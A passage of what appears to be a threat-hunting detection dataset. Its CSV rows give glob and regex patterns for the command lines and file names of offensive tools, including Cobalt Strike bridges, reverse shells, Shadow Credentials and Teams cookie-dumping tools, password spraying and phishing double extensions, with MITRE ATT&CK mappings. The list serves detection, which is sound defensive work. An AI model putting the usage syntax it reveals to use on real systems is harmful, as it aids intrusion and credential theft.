password*",".{0,1000}\.py\s127\.0\.0\.1\s50050\slogtracker\spassword.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*.py -action add_computer -crt * -key * -domain * -dc-ip * -computer-name * -computer-pass *",".{0,1000}\.py\s\-action\sadd_computer\s\-crt\s.{0,1000}\s\-key\s.{0,1000}\s\-domain\s.{0,1000}\s\-dc\-ip\s.{0,1000}\s\-computer\-name\s.{0,1000}\s\-computer\-pass\s.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213","TA0006 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","10","5","493","62","2023-12-18T16:05:02Z","2022-04-29T09:08:32Z" "*.py -aesKey
""9ff86898afa70f5f7b9f2bf16320cb38edb2639409e1bc441ac417fac1fed5ab""*",".{0,1000}\.py\s\-aesKey\s\""9ff86898afa70f5f7b9f2bf16320cb38edb2639409e1bc441ac417fac1fed5ab\"".{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*.py -c -m c2 -p utils*",".{0,1000}\.py\s\-c\s\-m\sc2\s\-p\sutils.{0,1000}","offensive_tool_keyword","Kraken","Kraken is a modular multi-language webshell focused on web post-exploitation and defense evasion.","T1505 - T1547 - T1218 - T1564.001","TA0003 - TA0005 - TA0011 ","N/A","N/A","C2","https://github.com/kraken-ng/Kraken","1","0","N/A","10","10","495","48","2024-02-10T20:10:18Z","2023-02-21T10:23:55Z" "*.py --cached --ntuser NTUSER.DAT*",".{0,1000}\.py\s\-\-cached\s\-\-ntuser\sNTUSER\.DAT.{0,1000}","offensive_tool_keyword","LocalShellExtParse","Script to parse first load time for Shell Extensions loaded by user. 
Also enumerates all loaded Shell Extensions that are only installed for the Current User.","T1547.009 - T1129","TA0003 - TA0007","N/A","N/A","Discovery","https://github.com/herrcore/LocalShellExtParse","1","0","N/A","9","1","19","4","2015-06-08T16:55:38Z","2015-06-05T03:23:13Z" "*.py --certificate *.pem --private-key *.pem --listen-port *",".{0,1000}\.py\s\-\-certificate\s.{0,1000}\.pem\s\-\-private\-key\s.{0,1000}\.pem\s\-\-listen\-port\s.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","424","69","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z" "*.py --certificate fullchain.pem --private-key privkey.pem --listen-port *",".{0,1000}\.py\s\-\-certificate\sfullchain\.pem\s\-\-private\-key\sprivkey\.pem\s\-\-listen\-port\s.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","424","69","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z" "*.py --client ftp --username * --password * --ip * --datatype ssn*",".{0,1000}\.py\s\-\-client\sftp\s\-\-username\s.{0,1000}\s\-\-password\s.{0,1000}\s\-\-ip\s.{0,1000}\s\-\-datatype\sssn.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*.py --client https --data-size * --ip * --datatype cc*",".{0,1000}\.py\s\-\-client\shttps\s\-\-data\-size\s.{0,1000}\s\-\-ip\s.{0,1000}\s\-\-datatype\scc.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data 
detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*.py -d ""test.local"" -u ""john"" -p ""password123"" --target ""user2"" --action ""list"" --dc-ip ""10.10.10.1""*",".{0,1000}\.py\s\-d\s\""test\.local\""\s\-u\s\""john\""\s\-p\s\""password123\""\s\-\-target\s\""user2\""\s\-\-action\s\""list\""\s\-\-dc\-ip\s\""10\.10\.10\.1\"".{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","6","540","62","2023-12-17T12:46:07Z","2021-07-21T19:20:00Z" "*.py -d * -u * -p * --target * --action * --export PEM*",".{0,1000}\.py\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-target\s.{0,1000}\s\-\-action\s\s.{0,1000}\s\-\-export\sPEM.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","6","540","62","2023-12-17T12:46:07Z","2021-07-21T19:20:00Z" "*.py -d * -u * -p * --target * --action ""add"" --filename * ",".{0,1000}\.py\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-target\s.{0,1000}\s\-\-action\s\""add\""\s\-\-filename\s.{0,1000}\s","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","6","540","62","2023-12-17T12:46:07Z","2021-07-21T19:20:00Z" "*.py -d * -u * -p * --target * --action 
""clear""* ",".{0,1000}\.py\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-target\s.{0,1000}\s\-\-action\s\""clear\"".{0,1000}\s","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","6","540","62","2023-12-17T12:46:07Z","2021-07-21T19:20:00Z" "*.py -d * -u * -p * --target * --action ""info"" --device-id *",".{0,1000}\.py\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-target\s.{0,1000}\s\-\-action\s\""info\""\s\-\-device\-id\s.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","6","540","62","2023-12-17T12:46:07Z","2021-07-21T19:20:00Z" "*.py -d * -u * -p * --target * --action ""list"" *",".{0,1000}\.py\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-target\s.{0,1000}\s\-\-action\s\""list\""\s.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","6","540","62","2023-12-17T12:46:07Z","2021-07-21T19:20:00Z" "*.py -d * -u * -p * --target * --action ""remove"" --device-id *",".{0,1000}\.py\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-target\s.{0,1000}\s\-\-action\s\""remove\""\s\-\-device\-id\s.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","6","540","62","2023-12-17T12:46:07Z","2021-07-21T19:20:00Z" "*.py discover -H 
domain_list.txt*",".{0,1000}\.py\sdiscover\s\-H\sdomain_list\.txt.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","0","N/A","8","4","328","69","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*.py enum -H * -U *.txt -P *.txt -*.txt*",".{0,1000}\.py\senum\s\-H\s.{0,1000}\s\-U\s.{0,1000}\.txt\s\-P\s.{0,1000}\.txt\s\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","0","N/A","8","4","328","69","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*.py -f *.exe -e -m 4",".{0,1000}\.py\s\-f\s.{0,1000}\.exe\s\-e\s\-m\s4","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. 
shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","POST Exploitation tools","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","1","75","18","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z" "*.py --file *.ps1 --server amsi*",".{0,1000}\.py\s\-\-file\s.{0,1000}\.ps1\s\-\-server\samsi.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","4","316","34","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" "*.py --host * --type ntlm --output *.lnk*",".{0,1000}\.py\s\-\-host\s.{0,1000}\s\-\-type\sntlm\s\-\-output\s.{0,1000}\.lnk.{0,1000}","offensive_tool_keyword","LNKUp","Generates malicious LNK file payloads for data exfiltration","T1023.003 - T1048 - T1041 - T1204","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Plazmaz/LNKUp","1","0","N/A","10","4","311","54","2017-08-21T22:58:13Z","2017-08-09T16:18:07Z" "*.py -k * -f *.doc -o *.html*",".{0,1000}\.py\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.doc\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. 
along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*.py lock -H * -u administrator -d *",".{0,1000}\.py\slock\s\-H\s.{0,1000}\s\-u\sadministrator\s\-d\s.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","0","N/A","8","4","328","69","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*.py -method BOTH -dc-ip *",".{0,1000}\.py\s\-method\sBOTH\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1557","TA0001 - TA0006","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","0","N/A","8","5","427","61","2024-03-13T20:04:51Z","2022-01-16T06:50:44Z" "*.py -method LDAPS -dc-ip *",".{0,1000}\.py\s\-method\sLDAPS\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1557","TA0001 - TA0006","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","0","N/A","8","5","427","61","2024-03-13T20:04:51Z","2022-01-16T06:50:44Z" "*.py --ntuser NTUSER.DAT --usrclass UsrClass.dat*",".{0,1000}\.py\s\-\-ntuser\sNTUSER\.DAT\s\-\-usrclass\sUsrClass\.dat.{0,1000}","offensive_tool_keyword","LocalShellExtParse","Script to parse first load time for Shell Extensions loaded by user. 
Also enumerates all loaded Shell Extensions that are only installed for the Current User.","T1547.009 - T1129","TA0003 - TA0007","N/A","N/A","Discovery","https://github.com/herrcore/LocalShellExtParse","1","0","N/A","9","1","19","4","2015-06-08T16:55:38Z","2015-06-05T03:23:13Z" "*.py --server amsi --file *.exe*",".{0,1000}\.py\s\-\-server\samsi\s\-\-file\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","4","316","34","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" "*.py spray -ep *",".{0,1000}\.py\sspray\s\-ep\s.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","4","325","56","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" "*.py -t ldap://* --no-wcf-server --escalate-user *",".{0,1000}\.py\s\-t\sldap\:\/\/.{0,1000}\s\-\-no\-wcf\-server\s\-\-escalate\-user\s.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*.py -t template.tpe -c 'calc.exe'*",".{0,1000}\.py\s\-t\stemplate\.tpe\s\-c\s\'calc\.exe\'.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004?","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","9","1","92","12","2024-04-17T14:03:13Z","2024-04-17T13:00:12Z" "*.py teams 
--get*",".{0,1000}\.py\steams\s\-\-get.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","0","N/A","7","2","121","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z" "*.py teams --list*",".{0,1000}\.py\steams\s\-\-list.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","0","N/A","7","2","121","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z" "*.py -u * ?print-zones *",".{0,1000}\.py\s\-u\s.{0,1000}\s\?print\-zones\s.{0,1000}","offensive_tool_keyword","adidnsdump","By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones. similar to a zone transfer. 
This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks.","T1018 - T1087 - T1201 - T1056 - T1039","TA0005 - TA0009","N/A","N/A","Discovery","https://github.com/dirkjanm/adidnsdump","1","0","N/A","N/A","9","849","104","2023-12-13T15:56:51Z","2019-04-24T17:18:46Z" "*.py --zip -c All -d * -u * --hashes 'ffffffffffffffffffffffffffffffff':* -dc *",".{0,1000}\.py\s\-\-zip\s\-c\sAll\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-\-hashes\s\'ffffffffffffffffffffffffffffffff\'\:.{0,1000}\s\-dc\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*.py* --localtunnel *",".{0,1000}\.py.{0,1000}\s\-\-localtunnel\s.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*.py* --ngrok *",".{0,1000}\.py.{0,1000}\s\-\-ngrok\s.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. 
solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*.py* --payload *.ps1*",".{0,1000}\.py.{0,1000}\s\-\-payload\s.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","A simple python packer to easily bypass Windows Defender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Unknow101/FuckThatPacker","1","0","N/A","10","10","623","84","2022-04-03T18:20:01Z","2020-08-13T07:26:07Z" "*.py* service -action create -service-name *",".{0,1000}\.py.{0,1000}\sservice\s\-action\screate\s\-service\-name\s.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral 
Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*.py* -service-name * -hashes *",".{0,1000}\.py.{0,1000}\s\-service\-name\s.{0,1000}\s\-hashes\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","10","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*.py*.ccache *.kirbi *",".{0,1000}\.py.{0,1000}\.ccache\s.{0,1000}\.kirbi\s.{0,1000}","offensive_tool_keyword","ticket_converter","A little tool to convert ccache tickets into kirbi (KRB-CRED) and vice versa based on impacket.","T1558.003 - T1110.004","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/zer1t0/ticket_converter","1","1","N/A","10","2","163","31","2022-06-16T19:38:05Z","2019-05-14T04:48:19Z" "*.py*.kirbi 
*.ccache*",".{0,1000}\.py.{0,1000}\.kirbi\s.{0,1000}\.ccache.{0,1000}","offensive_tool_keyword","ticket_converter","A little tool to convert ccache tickets into kirbi (KRB-CRED) and vice versa based on impacket.","T1558.003 - T1110.004","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/zer1t0/ticket_converter","1","1","N/A","10","2","163","31","2022-06-16T19:38:05Z","2019-05-14T04:48:19Z" "*.py*found-users.txt*",".{0,1000}\.py.{0,1000}found\-users\.txt.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*.rar.exe*",".{0,1000}\.rar\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.rar.iso*",".{0,1000}\.rar\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.resources.123456.*",".{0,1000}\.resources\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 
- T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.reverst.tunnel:*",".{0,1000}\.reverst\.tunnel\:.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","10","10","611","22","2024-05-01T12:27:28Z","2024-04-03T13:32:11Z" "*.revshells.com*",".{0,1000}\.revshells\.com.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.rtf.bat*",".{0,1000}\.rtf\.bat.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.rtf.dll*",".{0,1000}\.rtf\.dll.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.rtf.exe*",".{0,1000}\.rtf\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - 
T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.rtf.htm*",".{0,1000}\.rtf\.htm.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.rtf.jar*",".{0,1000}\.rtf\.jar.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.rtf.js*",".{0,1000}\.rtf\.js.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.rtf.sfx*",".{0,1000}\.rtf\.sfx.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.rtf.vbs*",".{0,1000}\.rtf\.vbs.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.sccmhunter*",".{0,1000}\.sccmhunter.{0,1000}","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/garrettfoster13/sccmhunter","1","0","N/A","9","6","551","65","2024-04-10T20:49:24Z","2023-02-20T14:09:42Z" "*.search.123456.*",".{0,1000}\.search\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to 